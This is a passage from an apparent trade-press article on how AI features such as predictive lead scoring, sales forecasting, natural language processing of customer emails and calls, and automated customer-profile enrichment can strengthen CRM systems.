One such ability AI can offer a CRM is predictive lead scoring. Lead scoring is a way businesses and organizations identify and prioritize the highest-quality leads for their salespeople to connect with through a type of scoring system. As a business grows, this helps salespeople manage their time and pursue those leads that make the most sense.
Lead scoring with AI uses algorithms instead of people to predict which leads in a business’ database are qualified. Not all parameters are the same when predicting lead scores. AI easily can factor in information such as forms completed on your website, behavioral data, social media information, demographics, and even external information posted about your company.
With AI for predictive lead scoring, algorithms evaluate what information your customers have in common, as well as what information your leads that did not convert have in common. From there, the algorithm determines a formula that will organize leads for you automatically, so you easily can identify the most qualified ones. Imagine having to do this manually, and you can understand why AI is important for predictive lead scoring.
AI and Sales Forecasting
Along the same lines is the use of AI in sales forecasting. Sales forecasting is the process of estimating or looking ahead to sales downstream. Accurate sales forecasts can help companies make data-driven business decisions and predict performance both in the short and long term.
Sales forecasts can be based on industry comparisons, market trends, or even past sales data. With AI, companies can gain a better understanding of future revenue, improve resource allocation, better align teams with objectives, and calculate growth models.
If setting prediction parameters around your sales pipeline is difficult or unclear, or if sales forecasting is inaccurate, despite lots of legacy or current CRM data, you may need AI support in this regard.
AI and Natural Language Processing
Another powerful feature of an AI-enabled CRM is natural language processing (NLP). There are several ways people define NLP, but most tend to describe it as the ability of computers to understand and interpret human language the way it is written or spoken.
When a machine processes texts or spoken words from humans, they’re looking at data in 1s and 0s and not really hearing words. For AI to understand what you’re saying and turn those words into an action, NLP comes into play. Definitions aside, NLP can be used in several ways to enhance customer experience through a CRM.
For example, it can be used to determine what customers want from an email or text-based message. Customers or prospects often make similar requests through emails. A financial-based organization, for example, may receive daily messages from customers requesting new checks, or to open a new account, apply for a new credit card, or report a stolen card. Natural language processing can scan these messages and begin working on them before sales and customer support get involved.
What’s more, NLP then can determine which customer requests to prioritize. Reporting a stolen card is clearly more urgent than needing new checks. NLP can push customer and prospect requests that are urgent or time-sensitive to the front of the line, where sales and customer service can respond quickly.
When enabled through AI, NLP also can examine customer email interactions to get a better understanding of their experience, whether positive or negative. An organization that leverages insights in this way can remedy customer issues quickly, before they escalate.
Sales departments also can use AI to record voice meetings and phone calls, time-stamp specific notes, obtain transcripts, and even identify topics or words of specific meaning — like “budget,” “pricing” or “actions items” — or even target specific people. Sales teams then can return to exact moments in conversations after the call, glean specific insights, and combine them with existing CRM data to determine a best course of action.
Going deeper, AI can be used to analyze speaking patterns, word choices, or voice inflections to determine a caller’s emotions and offer resolution recommendations to sales reps, which could include telling users to slow speech pace, soften their tone, or even prompt supervisors to get involved when necessary.
One of the best ways for businesses to understand the needs of their customers is through tracking feedback, which can be collected through questionnaires, reviews, online comments and more.
A well-constructed survey can provide insightful and quantitative data, discover problems or challenges, and ultimately help a business gauge its progress or improvement over time. AI technology can not only streamline customer feedback programs and tactics, but also help companies eliminate unnecessary actions by evaluating communications that happen naturally every day.
At their core, CRMs are designed to store customer information and lots of it. AI easily can be applied to keeping customer records and information up to date, with little human help or data entry. These days, there is significantly more information than name, address, phone number and email that can be harvested and added to a customer’s profile, including social media channels, applications used, and even popular geolocation visits.
While AI can help sales teams dig through industry and social media data, it also can help companies properly allocate dollars to increase account-based marketing’s return on investment. Sales leaders can be handed high-value accounts or prospects that that meet very specific criteria, as well as search for others that are actively looking to buy. This can help marketers focus marketing and advertising funds toward prospects with the highest buying interest and prioritize engaged leads.
Who Needs AI?
Now that we’ve touched on a few ways AI can be leveraged in your business’ CRM system, the question is, do you really need it — or is it just another superfluous addition that won’t provide you with any real value? Not surprisingly, the answer depends on your business.
The common denominator, however, is this: The more data your business collects about customers and prospects, the greater the need for a CRM solution that can not only analyze all the data, but also provide useful insights and recommendations.
The move toward more powerful and more efficient CRM systems that reduce costs and save time is now possible thanks to AI. In today’s digital age, prompt, personalized and predictive services are essential to guaranteeing customer satisfaction and creating brand loyalty.
Businesses that utilize the full power of their CRM will find value in an integrated AI tool. On the other hand, organizations that struggle with their CRM, or with figuring out if they need one, likely will find AI confusing and unnecessary.
At the end of the day, CRM and AI are just tools from the sales and marketing toolbox. Neither replaces a thoughtful marketing strategy targeted at the right time, at the right audiences, and in the right context.
Conversely, a solid marketing strategy is only as good as the technology it sits on. Before leaping into the AI waters, master the fundamentals of your existing CRM. Once you’ve done that, unleashing the power of AI will help strengthen your sales and marketing teams and improve customer satisfaction. | <urn:uuid:5de9d191-6835-49f2-be95-c4177c477bf3> | CC-MAIN-2022-40 | https://www.ecommercetimes.com/story/better-customer-satisfaction-through-ai-enabled-crm-86029.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00594.warc.gz | en | 0.944008 | 1,836 | 2.875 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.